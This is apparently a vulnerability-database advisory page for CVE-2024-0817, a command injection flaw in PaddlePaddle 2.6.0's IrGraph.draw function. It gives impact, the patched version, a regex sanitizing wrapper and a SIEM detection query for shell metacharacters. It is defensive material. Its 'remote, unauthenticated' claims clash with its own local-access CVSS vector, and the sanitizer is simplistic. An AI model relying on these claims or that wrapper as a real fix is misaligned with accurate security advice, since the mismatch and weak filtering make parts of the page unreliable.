Login Sign Up

CVE-2024-0817

7.8 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability allows remote command injection in the IrGraph.draw function of PaddlePaddle 2.6.0. Attackers can execute arbitrary commands on the system by manipulating graph drawing parameters. This affects any application using the vulnerable PaddlePaddle version for machine learning tasks.

💻 Affected Systems

Products:
  • PaddlePaddle
Versions: 2.6.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects applications using IrGraph.draw function. PaddlePaddle is a deep learning framework primarily used in AI/ML applications.

📦 What is this software?

Paddlepaddle by Paddlepaddle

View all CVEs affecting Paddlepaddle →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with remote code execution leading to data theft, ransomware deployment, or complete system takeover.

🟠

Likely Case

Limited command execution within application context, potentially leading to data exfiltration or lateral movement within the network.

🟢

If Mitigated

No impact if proper input validation and sandboxing are implemented, or if vulnerable function is not exposed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details available in public bounty reports. Command injection vulnerabilities are frequently weaponized due to their straightforward exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.6.1 or later

Vendor Advisory: https://github.com/PaddlePaddle/Paddle/security/advisories

Restart Required: No

Instructions:

1. Update PaddlePaddle to version 2.6.1 or later using pip: pip install --upgrade paddlepaddle 2. Update any dependencies that may reference the vulnerable version 3. Test the updated application functionality

🔧 Temporary Workarounds

Input Validation Wrapper

all

Implement strict input validation for IrGraph.draw parameters to prevent command injection

# Python example: Validate/sanitize all parameters before passing to IrGraph.draw
import re
def safe_draw(params):
    # Remove shell metacharacters
    sanitized = re.sub(r'[;&|`$\\]', '', str(params))
    return IrGraph.draw(sanitized)

🧯 If You Can't Patch

  • Implement network segmentation to isolate PaddlePaddle systems from critical infrastructure
  • Deploy application-level firewalls with command injection detection rules

🔍 How to Verify

Check if Vulnerable:

Check PaddlePaddle version: python -c "import paddle; print(paddle.__version__)" - if output is 2.6.0, system is vulnerable

Check Version:

python -c "import paddle; print(paddle.__version__)"

Verify Fix Applied:

After update, verify version is 2.6.1 or later: python -c "import paddle; print(paddle.__version__)"

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in application logs
  • Error messages containing shell metacharacters in IrGraph.draw calls
  • Unexpected subprocess spawns from PaddlePaddle processes

Network Indicators:

  • Outbound connections from PaddlePaddle to unexpected destinations
  • Command and control traffic patterns

SIEM Query:

process_name:paddle AND (command_line:*;* OR command_line:*&* OR command_line:*|* OR command_line:*`*)

📊 Metadata

CVE ID: CVE-2024-0817
CVSS v3 Score: 7.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: March 7, 2024
Last Updated: January 19, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-0817, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)